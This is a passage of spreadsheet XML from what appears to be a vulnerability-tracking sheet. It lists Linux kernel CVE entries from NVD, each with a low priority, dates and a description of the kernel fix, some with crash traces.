          <t>CVE-2026-90225</t>
        </is>
      </c>
      <c r="D593" s="5" t="inlineStr"/>
      <c r="E593" s="5" t="inlineStr"/>
      <c r="F593" s="5" t="inlineStr"/>
      <c r="G593" s="5" t="inlineStr"/>
      <c r="H593" s="5" t="inlineStr"/>
      <c r="I593" s="5" t="inlineStr"/>
      <c r="J593" s="5" t="inlineStr"/>
      <c r="K593" s="5" t="inlineStr"/>
      <c r="L593" s="5" t="inlineStr"/>
      <c r="M593" s="5" t="inlineStr"/>
      <c r="N593" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O593" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P593" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q593" s="5" t="inlineStr"/>
      <c r="R593" s="5" t="inlineStr"/>
      <c r="S593" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nfc: llcp: read llcp_sock-&gt;local under the socket lock in getsockopt
nfc_llcp_getsockopt() read llcp_sock-&gt;local before lock_sock(sk) and
then dereferenced the cached pointer inside the locked region.
llcp_sock_bind() assigns and clears llcp_sock-&gt;local under the same
socket lock, dropping the last reference on its error path. A
getsockopt() racing an in-flight bind() can observe the pointer, block
on lock_sock(), and then dereference a freed nfc_llcp_local once bind()
has unwound.
Move the llcp_sock-&gt;local read and the NULL check inside the
lock_sock(sk) region so bind() cannot mutate or free the pointer between
the load and the use.</t>
        </is>
      </c>
      <c r="T593" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90225</t>
        </is>
      </c>
    </row>
    <row r="594">
      <c r="A594" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B594" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C594" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90226</t>
        </is>
      </c>
      <c r="D594" s="5" t="inlineStr"/>
      <c r="E594" s="5" t="inlineStr"/>
      <c r="F594" s="5" t="inlineStr"/>
      <c r="G594" s="5" t="inlineStr"/>
      <c r="H594" s="5" t="inlineStr"/>
      <c r="I594" s="5" t="inlineStr"/>
      <c r="J594" s="5" t="inlineStr"/>
      <c r="K594" s="5" t="inlineStr"/>
      <c r="L594" s="5" t="inlineStr"/>
      <c r="M594" s="5" t="inlineStr"/>
      <c r="N594" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O594" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P594" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q594" s="5" t="inlineStr"/>
      <c r="R594" s="5" t="inlineStr"/>
      <c r="S594" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nfc: llcp: avoid userspace overflow on invalid optlen
nfc_llcp_getsockopt() casts optval to (u32 __user *) for put_user(), so
the kernel always stores 4 bytes regardless of the caller-supplied
optlen. The existing min_t(u32, len, sizeof(u32)) only clamps the length
reported back to userspace; it does not constrain the store. A call with
optlen &lt; 4 therefore writes past the user buffer, violating the
getsockopt(2) contract for all five supported optnames.
Reject any call with optlen &lt; sizeof(u32) up front. 'len' is int, so a
plain size comparison would promote a negative optlen to size_t and slip
past the check; an explicit 'len &lt; 0' test is added first to catch
negative values before the size compare.</t>
        </is>
      </c>
      <c r="T594" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90226</t>
        </is>
      </c>
    </row>
    <row r="595">
      <c r="A595" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B595" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C595" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90227</t>
        </is>
      </c>
      <c r="D595" s="5" t="inlineStr"/>
      <c r="E595" s="5" t="inlineStr"/>
      <c r="F595" s="5" t="inlineStr"/>
      <c r="G595" s="5" t="inlineStr"/>
      <c r="H595" s="5" t="inlineStr"/>
      <c r="I595" s="5" t="inlineStr"/>
      <c r="J595" s="5" t="inlineStr"/>
      <c r="K595" s="5" t="inlineStr"/>
      <c r="L595" s="5" t="inlineStr"/>
      <c r="M595" s="5" t="inlineStr"/>
      <c r="N595" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O595" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P595" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q595" s="5" t="inlineStr"/>
      <c r="R595" s="5" t="inlineStr"/>
      <c r="S595" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nvme/ioctl: check SUBMIT_IO with nvme_cmd_allowed()
Unlike IO_CMD / IO64_CMD, NVME_IOCTL_SUBMIT_IO never calls
nvme_cmd_allowed(). Unprivileged callers can thus issue I/O on a
partition device or write through a read-only file descriptor.
Pass flags and open_for_write through and reject disallowed commands
with -EACCES.</t>
        </is>
      </c>
      <c r="T595" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90227</t>
        </is>
      </c>
    </row>
    <row r="596">
      <c r="A596" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B596" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C596" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90228</t>
        </is>
      </c>
      <c r="D596" s="5" t="inlineStr"/>
      <c r="E596" s="5" t="inlineStr"/>
      <c r="F596" s="5" t="inlineStr"/>
      <c r="G596" s="5" t="inlineStr"/>
      <c r="H596" s="5" t="inlineStr"/>
      <c r="I596" s="5" t="inlineStr"/>
      <c r="J596" s="5" t="inlineStr"/>
      <c r="K596" s="5" t="inlineStr"/>
      <c r="L596" s="5" t="inlineStr"/>
      <c r="M596" s="5" t="inlineStr"/>
      <c r="N596" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O596" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P596" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q596" s="5" t="inlineStr"/>
      <c r="R596" s="5" t="inlineStr"/>
      <c r="S596" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nvmet: fix NULL pointer dereference in nvmet_execute_identify_ns_zns()
When a host issues an Identify command with CNS 05h (I/O Command Set
specific Identify Namespace) and CSI 02h (ZNS) targeting a file-backed
namespace, nvmet_execute_identify_ns_zns() calls bdev_is_zoned() on
req-&gt;ns-&gt;bdev. A file-backed namespace has no block device, so
req-&gt;ns-&gt;bdev is NULL and bdev_is_zoned() dereferences it, oopsing.
The I/O command set is selected by the host-supplied CSI field and the
command is routed here whenever CONFIG_BLK_DEV_ZONED is enabled,
independent of the namespace backing type, so any file-backed namespace
is exposed.
Reject the command with Invalid Field when the namespace is not backed
by a block device.</t>
        </is>
      </c>
      <c r="T596" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90228</t>
        </is>
      </c>
    </row>
    <row r="597">
      <c r="A597" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B597" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C597" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90229</t>
        </is>
      </c>
      <c r="D597" s="5" t="inlineStr"/>
      <c r="E597" s="5" t="inlineStr"/>
      <c r="F597" s="5" t="inlineStr"/>
      <c r="G597" s="5" t="inlineStr"/>
      <c r="H597" s="5" t="inlineStr"/>
      <c r="I597" s="5" t="inlineStr"/>
      <c r="J597" s="5" t="inlineStr"/>
      <c r="K597" s="5" t="inlineStr"/>
      <c r="L597" s="5" t="inlineStr"/>
      <c r="M597" s="5" t="inlineStr"/>
      <c r="N597" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O597" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P597" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q597" s="5" t="inlineStr"/>
      <c r="R597" s="5" t="inlineStr"/>
      <c r="S597" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nvme-apple: Destroy the admin queue on removal
The admin queue is allocated with blk_mq_alloc_queue() but never
destroyed. nvme_free_ctrl() only drops the last reference and
blk_mq_exit_queue() and blk_sync_queue() never run: the hctx is never
moved to q-&gt;unused_hctx_list and the timeout timer and work stay armed on
a queue that is about to be freed which will eventually oops inside
blk_mq_timeout_work().
This can only be triggered when the controller fails to come up and is
then immediately torn down again which is why no one ever ran into this
before.
Let's just copy what the pcie driver does: unquiesce and destroy the admin
queue before nvme_uninit_ctrl().
With this the following WARN followed by a panic no longer happens:
  WARNING: block/blk-mq.c:4390 at blk_mq_release+0x194/0x238, CPU#4: kworker/u34:4/119
  CPU: 4 UID: 0 PID: 119 Comm: kworker/u34:4 Not tainted 7.2.0-rc1-dirty #248 PREEMPT
  Hardware name: Apple Mac mini (M1, 2020) (DT)
  Workqueue: nvme-wq apple_nvme_remove_dead_ctrl_work
  pstate: 61400005 (nZCv daif +PAN -UAO -TCO +DIT -SSBS BTYPE=--)
  pc : blk_mq_release+0x194/0x238
  lr : blk_mq_release+0x58/0x238
  sp : ffffc000833a3b50
  x29: ffffc000833a3b50 x28: ffff80001d0450f8 x27: ffff800020c95200
  x26: 0000000000000088 x25: 0000000000000000 x24: ffff800020f36805
  x23: 0000000000000000 x22: ffffc00081a86878 x21: ffff800020be9c60
  x20: 0000000000000000 x19: ffff800022501698 x18: 000000000000000a
  x17: 7365757165722066 x16: 666f7265776f7020 x15: 0000000000000000
  x14: 0000000000000028 x13: 0000000000004def x12: 0000000000000003
  x11: 0000000000000000 x10: 0000000000000000 x9 : ffffc000805b4fc8
  x8 : ffffc00081915820 x7 : ffffc00081c4f3c8 x6 : 0000000000000001
  x5 : 0000000000000004 x4 : ffff800022498d80 x3 : ffffc000833a3b14
  x2 : 0000000000000000 x1 : 0000000000000000 x0 : ffff800022501698
  Call trace:
   blk_mq_release+0x194/0x238 (P)
   blk_put_queue+0x8c/0xf0
   nvme_free_ctrl+0x4c/0x260
   device_release+0x44/0x128
   kobject_put+0xa0/0x120
   put_device+0x1c/0x40
   nvme_uninit_ctrl+0x48/0x60
   apple_nvme_remove+0x54/0xb0
   platform_remove+0x28/0x40
   device_remove+0x54/0x98
   device_release_driver_internal+
   device_release_driver+0x20/0x38
   apple_nvme_remove_dead_ctrl_wor
   process_one_work+0x1f4/0x770
   worker_thread+0x1b8/0x360
   kthread+0x140/0x160
   ret_from_fork+0x10/0x20
  irq event stamp: 448
  hardirqs last  enabled at (447):in_unlock_irqrestore+0x74/0x80
  hardirqs last disabled at (448): [&lt;ffffc000811cf5c0&gt;] el1_brk64+0x20/0x60
  softirqs last  enabled at (0): [ess+0xb28/0x2698
  softirqs last disabled at (0): [&lt;0000000000000000&gt;] 0x0
  ---[ end trace 0000000000000000
  Unable to handle kernel NULL pointer dereference at virtual address 0000000000000000
  Mem abort info:
    ESR = 0x0000000096000005
    EC = 0x25: DABT (current EL),
    SET = 0, FnV = 0
    EA = 0, S1PTW = 0
    FSC = 0x05: level 1 translation fault
  Data abort info:
    ISV = 0, ISS = 0x00000005, ISS2 = 0x00000000
    CM = 0, WnR = 0, TnD = 0, TagA
    GCS = 0, Overlay = 0, DirtyBit = 0, Xs = 0
  [0000000000000000] user address
  Internal error: Oops: 0000000096000005 [#1]  SMP
  CPU: 7 UID: 0 PID: 54 Comm: kwor          7.2.0-rc1-dirty #248PREEMPT
  Tainted: [W]=WARN
  Hardware name: Apple Mac mini (M1, 2020) (DT)
  Workqueue: kblockd blk_mq_timeou
  pstate: 01400005 (nzcv daif +PAN -UAO -TCO +DIT -SSBS BTYPE=--)
  pc : percpu_ref_tryget_many.cons
  lr : percpu_ref_tryget_many.constprop.0+0xc0/0x168
  sp : ffffc000829cbce0
  x29: ffffc000829cbce0 x28: ffff800020be9f48 x27: ffff800013e503c0
  x26: 0000000000000108 x25: 000009c05
  x23: 0000000000000000 x22: ffffc000819f5000 x21: ffff800020be9f48
  x20: ffff8001deda4808 x19: ffff8000a
  x17: 00000000580e1fac x16: ffffc00082bbbb7c x15: 0000000000000000
  x14: 0000000000000028 x13: 000000001
  x11: 0000000000000000 x10: 0000000000000000 x9 : ffffc000829cbc20
  x8 : 
---truncated---</t>
        </is>
      </c>
      <c r="T597" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90229</t>
        </is>
      </c>
    </row>
    <row r="598">
      <c r="A598" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B598" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C598" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90230</t>
        </is>
      </c>
      <c r="D598" s="5" t="inlineStr"/>
      <c r="E598" s="5" t="inlineStr"/>
      <c r="F598" s="5" t="inlineStr"/>
      <c r="G598" s="5" t="inlineStr"/>
      <c r="H598" s="5" t="inlineStr"/>
      <c r="I598" s="5" t="inlineStr"/>
      <c r="J598" s="5" t="inlineStr"/>
      <c r="K598" s="5" t="inlineStr"/>
      <c r="L598" s="5" t="inlineStr"/>
      <c r="M598" s="5" t="inlineStr"/>
      <c r="N598" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O598" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P598" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q598" s="5" t="inlineStr"/>
      <c r="R598" s="5" t="inlineStr"/>
      <c r="S598" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nvmet: fix heap out-of-bounds read in nvmet_auth_negotiate()
nvmet_execute_auth_send() allocates the DH-HMAC-CHAP message buffer with
the host-supplied transfer length (tl) and hands it to
nvmet_auth_negotiate() without passing tl along. nvmet_auth_negotiate()
then reads the negotiate header and, for each of the halen hash
identifiers and dhlen DH group identifiers, indexes into the fixed
idlist[60] array (hashes at idlist[0..halen), groups at idlist[30..]).
Neither the transfer length nor halen/dhlen is validated. A malicious or
non-conformant host can report a tl smaller than the negotiate structure,
or a halen/dhlen larger than the array (both are u8, up to 255), making
the loops read past the end of the allocated buffer (heap out-of-bounds
read). The sibling nvmet_auth_reply() already validates tl against the
structure size; the negotiate path did not.
Pass tl into nvmet_auth_negotiate(), reject a tl that does not cover the
negotiate data plus one full protocol descriptor, and reject halen/dhlen
larger than NVME_AUTH_DHCHAP_MAX_DH_IDS.</t>
        </is>
      </c>
      <c r="T598" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90230</t>
        </is>
      </c>
    </row>
    <row r="599">
      <c r="A599" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B599" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C599" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90231</t>
        </is>
      </c>
      <c r="D599" s="5" t="inlineStr"/>
      <c r="E599" s="5" t="inlineStr"/>
      <c r="F599" s="5" t="inlineStr"/>
      <c r="G599" s="5" t="inlineStr"/>
      <c r="H599" s="5" t="inlineStr"/>
      <c r="I599" s="5" t="inlineStr"/>
      <c r="J599" s="5" t="inlineStr"/>
      <c r="K599" s="5" t="inlineStr"/>
      <c r="L599" s="5" t="inlineStr"/>
      <c r="M599" s="5" t="inlineStr"/>
      <c r="N599" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O599" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P599" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q599" s="5" t="inlineStr"/>
      <c r="R599" s="5" t="inlineStr"/>
      <c r="S599" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
apparmor: fix unconfined user namespace restriction forced stack
If a task is already confined by a stack the unprivileged transition
restriction on unconfined is not correctly, applied. This results in
an escape if two transitions through an unconfined profile can be
executed.
Fix this by pushing the check into the per profile label build. The
check will always be done against unconfined and result in a stack of
just the unconfined component when necessary.</t>
        </is>
      </c>
      <c r="T599" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90231</t>
        </is>
      </c>
    </row>
    <row r="600">
      <c r="A600" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B600" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C600" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90232</t>
        </is>
      </c>
      <c r="D600" s="5" t="inlineStr"/>
      <c r="E600" s="5" t="inlineStr"/>
      <c r="F600" s="5" t="inlineStr"/>
      <c r="G600" s="5" t="inlineStr"/>
      <c r="H600" s="5" t="inlineStr"/>
      <c r="I600" s="5" t="inlineStr"/>
      <c r="J600" s="5" t="inlineStr"/>
      <c r="K600" s="5" t="inlineStr"/>
      <c r="L600" s="5" t="inlineStr"/>
      <c r="M600" s="5" t="inlineStr"/>
      <c r="N600" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O600" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P600" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q600" s="5" t="inlineStr"/>
      <c r="R600" s="5" t="inlineStr"/>
      <c r="S600" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
amt: Don't support cross-netns setup.
When a lower device is unregistered, amt_device_event() tries
to unregister its upper AMT device, but it has two problems.
  1. amt_lookup_upper_dev() looks up an upper device in the
      lower device's netns only
  2. amt_device_event() unregisters a single upper device only
If AMT device is created on a lower device in another netns,
removing the lower device triggers the splat below and gets
stuck until all upper devices are removed. [0]
The cross-netns setup seems unintentional considering 1. and
the following points:
  * amt_link_setup() sets dev-&gt;netns_immutable to true
  * skb_scrub_packet() is not called in the fast path
  * iproute2 binary fails to find cross-netns lower device via
    link-netns:
      # ip -n ns1 link add amt0 link-netns ns2 type amt dev veth1
      Cannot find device "veth1"
Instead of supporting it properly and preparing for per-netns
netdev unreg, let's forbid cross-netns setup.
Note that the problem 2. needs a separate fix.
[0]:
WARNING: net/core/dev.c:12518 at unregister_netdevice_many_notify+0x1cce/0x2250, CPU#48: ip/2031
Modules linked in:
CPU: 48 UID: 0 PID: 2031 Comm: ip Not tainted 7.2.0-rc5+ #27 PREEMPT(full)
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.17.0-debian-1.17.0-1 04/01/2014
RIP: 0010:unregister_netdevice_many_notify (net/core/dev.c:12518)
Code: 89 ef e8 d5 52 ae fe e9 d0 f4 ff ff 48 8d 3d f9 3b 9c 02 48 c7 c6 c0 0b 63 84 ba ab 1f 00 00 67 48 0f b9 3a e9 65 ff ff ff 90 &lt;0f&gt; 0b 90 eb 81 48 8d 3d f6 3b 9c 02 48 c7 c6 c0 0b 63 84 ba e2 1f
RSP: 0018:ffffc90004abf160 EFLAGS: 00010212
RAX: ffff888104d38260 RBX: ffff88800b0911b8 RCX: dffffc0000000000
RDX: 0000000000000000 RSI: 0000000000000008 RDI: ffffffff85b9f880
RBP: ffffc90004abf2d0 R08: ffffffff85b9f887 R09: 1ffffffff0b73f10
R10: dffffc0000000000 R11: fffffbfff0b73f11 R12: ffff88800b091d08
R13: ffff88800b091178 R14: dffffc0000000000 R15: ffff88800b091000
FS:  00007f555b86c600(0000) GS:ffff8881942a0000(0000) knlGS:0000000000000000
CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 0000562107d489c0 CR3: 0000000109a40002 CR4: 0000000000372ef0
Call Trace:
 &lt;TASK&gt;
 rtnl_dellink (net/core/rtnetlink.c:3632 net/core/rtnetlink.c:3674)
 rtnetlink_rcv_msg (net/core/rtnetlink.c:7112)
 netlink_rcv_skb (net/netlink/af_netlink.c:2556)
 netlink_unicast (net/netlink/af_netlink.c:1319)
 netlink_sendmsg (net/netlink/af_netlink.c:1900)
 ____sys_sendmsg (net/socket.c:775)
 __sys_sendmsg (net/socket.c:2738)
 do_syscall_64 (arch/x86/entry/syscall_64.c:63)
 entry_SYSCALL_64_after_hwframe (arch/x86/entry/entry_64.S:121)
...
unregister_netdevice: waiting for veth0 to become free. Usage count = 7
ref_tracker: netdev@ffff88800d7496d8 has 3/3 users at
     __netdev_adjacent_dev_insert (./include/linux/netdevice.h:4525 ./include/linux/netdevice.h:4554 net/core/dev.c:8791)
     __netdev_upper_dev_link (net/core/dev.c:8879 net/core/dev.c:8963)
     netdev_upper_dev_link (net/core/dev.c:9009)
     amt_newlink (drivers/net/amt.c:3321)</t>
        </is>
      </c>
      <c r="T600" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90232</t>
        </is>
      </c>
    </row>
    <row r="601">
      <c r="A601" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B601" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C601" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90233</t>
        </is>
      </c>
      <c r="D601" s="5" t="inlineStr"/>
      <c r="E601" s="5" t="inlineStr"/>
      <c r="F601" s="5" t="inlineStr"/>
      <c r="G601" s="5" t="inlineStr"/>
      <c r="H601" s="5" t="inlineStr"/>
      <c r="I601" s="5" t="inlineStr"/>
      <c r="J601" s="5" t="inlineStr"/>
      <c r="K601" s="5" t="inlineStr"/>
      <c r="L601" s="5" t="inlineStr"/>
      <c r="M601" s="5" t="inlineStr"/>
      <c r="N601" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O601" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P601" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q601" s="5" t="inlineStr"/>
      <c r="R601" s="5" t="inlineStr"/>
      <c r="S601" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nvme-pci: release descriptor pools on probe failure
The per-NUMA-node descriptor DMA pools are created lazily from
nvme_init_hctx_common() once the admin tag set is allocated, but they are
only destroyed in nvme_remove() via nvme_release_descriptor_pools(). Any
probe failure after the admin tag set has been allocated unwinds through
the out_disable label and nvme_pci_free_ctrl(), neither of which releases
the pools, leaking the dma_pool objects.
Release the descriptor pools in the out_disable error path. It must not
be added to nvme_pci_free_ctrl(), as that would double-free against
nvme_remove() on the normal teardown path.</t>
        </is>
      </c>
      <c r="T601" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90233</t>
        </is>
      </c>
    </row>
    <row r="602">
      <c r="A602" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B602" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C602" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90234</t>
        </is>
      </c>
      <c r="D602" s="5" t="inlineStr"/>
      <c r="E602" s="5" t="inlineStr"/>
      <c r="F602" s="5" t="inlineStr"/>
      <c r="G602" s="5" t="inlineStr"/>
      <c r="H602" s="5" t="inlineStr"/>
      <c r="I602" s="5" t="inlineStr"/>
      <c r="J602" s="5" t="inlineStr"/>
      <c r="K602" s="5" t="inlineStr"/>
      <c r="L602" s="5" t="inlineStr"/>
      <c r="M602" s="5" t="inlineStr"/>
      <c r="N602" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O602" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P602" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q602" s="5" t="inlineStr"/>
      <c r="R602" s="5" t="inlineStr"/>
      <c r="S602" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
NFS: Return a delegation the client fails to record
When an NFS server grants a delegation in an OPEN reply,
nfs_inode_set_delegation() records it on the client. However, three
of its error flows return without sending DELEGRETURN.
A delegation can be relinquished only by DELEGRETURN (RFC 8881
Section 20.2.4), so dropping one silently leaves the server believing
the client still holds it. If the server happens to recall that
delegation, the client answers CB_RECALL with NFS4ERR_BADHANDLE
because it has no record of the stateid. The server revokes the
delegation and moves it onto its cl_revoked list, because the client
never sends the FREE_STATEID that would drain it. Every subsequent
SEQUENCE reply then carries SEQ4_STATUS_RECALLABLE_STATE_REVOKED,
and the client's state manager loops issuing TEST_STATEID across its
delegations without ever clearing the condition.
The window is easy to reach now that a server offers a write
delegation on any write OPEN: a delegation recalled for one opener
races a re-open that the server answers with a fresh write
delegation.
Instead of dropping it, hand the delegation back during these error
flows.</t>
        </is>
      </c>
      <c r="T602" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90234</t>
        </is>
      </c>
    </row>
    <row r="603">
      <c r="A603" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B603" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C603" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90235</t>
        </is>
      </c>
      <c r="D603" s="5" t="inlineStr"/>
      <c r="E603" s="5" t="inlineStr"/>
      <c r="F603" s="5" t="inlineStr"/>
      <c r="G603" s="5" t="inlineStr"/>
      <c r="H603" s="5" t="inlineStr"/>
      <c r="I603" s="5" t="inlineStr"/>
      <c r="J603" s="5" t="inlineStr"/>
      <c r="K603" s="5" t="inlineStr"/>
      <c r="L603" s="5" t="inlineStr"/>
      <c r="M603" s="5" t="inlineStr"/>
      <c r="N603" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O603" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P603" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q603" s="5" t="inlineStr"/>
      <c r="R603" s="5" t="inlineStr"/>
      <c r="S603" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
sunrpc: xprtsock: annotate shared socket callbacks with READ_ONCE/WRITE_ONCE
xprtsock replaces and restores sk-&gt;sk_data_ready and
sk-&gt;sk_write_space on live sockets with plain stores, and
xs_udp_do_set_buffer_size() invokes sk-&gt;sk_write_space via a plain
load. These callback pointers are shared with generic socket and
protocol paths that may read or invoke them concurrently, so xprtsock
needs the same READ_ONCE()/WRITE_ONCE() callback visibility contract
that the validated 4022 family applied elsewhere.
When SUNRPC takes over an AF_LOCAL, UDP, or TCP socket and later
restores the lower-socket callbacks during teardown, another CPU may
still hold an earlier callback snapshot. The plain replace/restore
pattern leaves the same visibility hole as the validated 4022 family,
so a stale snapshot can still invoke xs_data_ready() or
xs_udp_write_space() after the live callback fields have already been
restored to the lower-socket handlers.
Use WRITE_ONCE() for the shared sk_data_ready and sk_write_space
stores in xs_local_finish_connecting(), xs_udp_finish_connecting(),
xs_tcp_finish_connecting(), and xs_restore_old_callbacks(). Use
READ_ONCE() for the direct sk_write_space invocation in
xs_udp_do_set_buffer_size(). This matches the required callback
visibility contract while leaving adjacent sk_state_change and
sk_error_report handling unchanged.</t>
        </is>
      </c>
      <c r="T603" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90235</t>
        </is>
      </c>
    </row>
    <row r="604">
      <c r="A604" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B604" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C604" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90236</t>
        </is>
      </c>
      <c r="D604" s="5" t="inlineStr"/>
      <c r="E604" s="5" t="inlineStr"/>
      <c r="F604" s="5" t="inlineStr"/>
      <c r="G604" s="5" t="inlineStr"/>
      <c r="H604" s="5" t="inlineStr"/>
      <c r="I604" s="5" t="inlineStr"/>
      <c r="J604" s="5" t="inlineStr"/>
      <c r="K604" s="5" t="inlineStr"/>
      <c r="L604" s="5" t="inlineStr"/>
      <c r="M604" s="5" t="inlineStr"/>
      <c r="N604" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O604" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P604" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q604" s="5" t="inlineStr"/>
      <c r="R604" s="5" t="inlineStr"/>
